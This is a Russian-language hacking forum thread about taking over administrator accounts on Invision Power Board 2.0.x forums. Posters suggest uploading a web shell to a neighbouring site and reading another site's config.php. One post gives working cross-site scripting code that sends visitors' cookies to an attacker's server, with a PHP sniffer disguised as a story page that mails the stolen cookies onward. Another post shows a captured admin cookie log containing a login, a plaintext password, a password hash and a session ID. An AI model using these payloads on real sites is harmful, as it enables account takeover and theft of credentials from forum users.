А есть какой нибудь эксплойт или способ получить админские сессии в Ipb 2.0.4.?

Попробуй скачать сплоит с www.rst.void.ru
Он тебе выдаст хэш с какойто двойной зашифровкой.
Если с ним позаморачиваться то можно узнать хэш который легко расшифровывается в PasswordPro И уже с пасом можешь бороздить по админским просторам :)

Exploit DO 2.0.4, v 2.0.4 vrode netu sqlinj

2 Барсик

я не совсем поняла? всмысле так я получу хеш пасса админа с солью? дык он у меня уже есть :-) бручу уже третьи сутки :-))) и очень сомневаюсь что расбручу. у меня немного другая заморочка- как поиметь доступ к админской панели без расшифрованого пасса )))))

2Green_Bear

извини я немного туплю, но что ты сказал? :-D вторую чать я поняла, что в 2.0.4 sqlиньекций нету, а вот что это такое - Exploit DO 2.0.4? это так експлойт называется? :-))) и если да, то чето я в поисковике ничего похожего найти пока немогу

2 Барсик
как поиметь доступ к админской панели без расшифрованого пасса )))))
А никак. Чтоб в админку попасть надо знать пасс админа.

2Green_Bear

извини я немного туплю, но что ты сказал? :-D вторую чать я поняла, что в 2.0.4 sqlиньекций нету, а вот что это такое - Exploit DO 2.0.4? это так експлойт называется? :-))) и если да, то чето я в поисковике ничего похожего найти пока немогу
DO 2.0.4
до 2.0.4
< 2.04

ну хорошо. что то у меня досих пор ничего не получается. какие вообще есть варианты получения админки в форумах (неважно каких) без расшифрованого пасса?

ну хорошо. что то у меня досих пор ничего не получается. какие вообще есть варианты получения админки в форумах (неважно каких) без расшифрованого пасса?Залить шелл на какой-нибудь простенький сайт на том-же серваке (узнать на domaindb.net), а от туда уже танцевать. Но это уже другая тема.

2Azazel
угу. спасибо. тогда уж удьте так любезны, если вдруг тут обсуждлось нечто подобное, киньте хоть название топика. потому что по поисковику тут я не нашла. а весь форум читать буду очень долго

>>> форум читать буду очень долго
Долго, но полезно :-)

А насчёт ссылочки - ну не описывается это всё нигде в одной теме + от многих вещей зависит.

Это же всё-таки не инструкция к микроволновой печке. :)

ехххх... ну и на том спасибо... хотя для человека который всего неделю назад узнал что такое експлойт и что такое командная строка - слишком много иноформации ((((

2Azazel

мнээээ.. я тут подумала... это всмысле залить шелл, получить доступ к базе и посмотреть там сессии (если они конечно там пишутся)? я правильно думаю или чушь сморозила?

2Azazel

мнээээ.. я тут подумала... это всмысле залить шелл, получить доступ к базе и посмотреть там сессии (если они конечно там пишутся)? я правильно думаю или чушь сморозила?

Правильно...Тока в админке можна и хеши посмотреть на юзерей...

2Azazel

мнээээ.. я тут подумала... это всмысле залить шелл, получить доступ к базе и посмотреть там сессии (если они конечно там пишутся)? я правильно думаю или чушь сморозила?Правильно, правильно: хэши и соль от паролей можно посмотреть. А так, толку от XSS на вторых версиях по моему мало.

это называется атака через соседа,помню в каком то номере журнала хакер была такая тема =).

через шелл не пробовала и не буду. чтобы получить доступ к базе, надо хотябы знать ее название, рута и пасс...короче инахх (((

Зря ты так. Заливаем шелл на тот же сервак. Выполняем комманду pwd
Получаем примерно /my/seycas/na/site/111/www/html/
Потом пишем cat /my/seycas/na/site/222/www/html/config.php и получаем то что ты хочешь знать.
Теоретически - это сработает. Практически, зависит от сервера.

Если форум поддерживает закачку html фаиликов к топикам то простой выход это - создаем топик(с максимально популярной темой) внутри которого находиться строчка типа: <script language=JavaScript>document.location.href="http://www.vash_server.ru/test.php?"+document.cookie</script>

затем заливаем на сервак который указали: фаилик test.php(c интересной историей например):
<?php
if(isset($QUERY_STRING));
{
$date=date('d.m.y:H:i:s');
mail("ваше@мыло.ru","New Coookie","Date and Time:$date\nIP:$REMOTE_ADDR\nAdress:$HTTP_REFERER\ nCookie:$QUERY_STRING");
}
header('Content-Type=text/html\n\n\n\n');
echo "<html><head><meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1251\"><title>story</title></head><body><pre>" .
"Есть у меня друг Костя, большой любитель представительниц женского пола.\n" .
"Если мы шли гулять и Костя не трахнул новую девушку - то вечер считался\n" .
"прожитым зря. И вот однажды на дискотеке Костя встретил ЕЁ. ОНА была\n" .
"достаточно симпатичной особой, к тому же, как и Костя, разведенной.\n" .
"Спустя месяц Костя сообщил мне, что собирается на НЕЙ жениться. Мало\n" .
"того, он сообщил, что \"завязал\", что уже давно не ходит по барам и\n" .
"вообще больше \"баб не цепляет\".\n" .
" \n" .
"Гоша Севастопольский" .
"</pre></body></html>";
?>

в результате на мыло приходят cookies с хешами паролей )) просто и сердито.

Естественно удача тут очень сильно влияет

Помоги(те) полажуйста ! Если адрес снифера http://antichat.org/s/tyui.gif ,то как будет выглядеть эта строка
<scriptlanguage=JavaScript>document.location.href="http://www.vash_server.ru/test.php?"+document.cookie</script>

Помоги(те) полажуйста ! Если адрес снифера http://antichat.org/s/abcd.gif ,то как будет выглядеть эта строка
<scriptlanguage=JavaScript>document.location.href="http://www.vash_server.ru/test.php?"+document.cookie</script>

Вместо http://www.vash_server.ru/test.php? подставь адрес своего сниффера. Сможешь?-)

Вместо http://www.vash_server.ru/test.php? подставь адрес своего сниффера. Сможешь?-)
Там проблема в другом была.Спасибо,уже разобрался.

а кто нибудь пробовал чтонибудь делать с аттачментами, которые пишутся в папку uploads? там проблема в том, что расширение мняется или в чем то еще? это я к тому что можно ли както аттачментом залить шелл, а потом его както использовать?

Не знаю как для кого, но для меня было потрясающей
новостью, что при использовании хсс ко мне пришли
куки админа, содержащие логин и пасс в ОТКРЫТОМ виде. (Атаковался IPB 2.0.1)
-------------------------------------
IP: *.*.*.100
REFERER: http://***/forum/index.php?showtopic=175&st=80
QUERY: 69&member_id=1; pass_hash=f8447ce02eba492abe3249294aed4bf4;
forum_read=a:10:
{i:3;i:1134211808;i:2;i:1134174577;i:8;i:113421833 2;i:
11;i:1134081264;i:13;i:1133595567;i:7;i:1133683890 ;i:
12;i:1133683875;i:10;i:1134174724;i:5;i:1133951226 ;i:
6;i:1134221372;};
acpcollapseprefs=100,200,900,1400; anonlogin=-1;
topicmode=linear; slogin=ariman;spass=tornado;
session_id=dcbf597a8db2190e362cf4ffd8b15dcb;
modtids=,; topicsread=a:1:{i:175;i:1134231356;}
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1; SV1)-------------------------------------
Как так получилось? Ответ:
В том случае если админ лезет модерировать форум и видит вашу мессагу,
к вам придет логин и пасс в открытом виде.
Проверено-канает.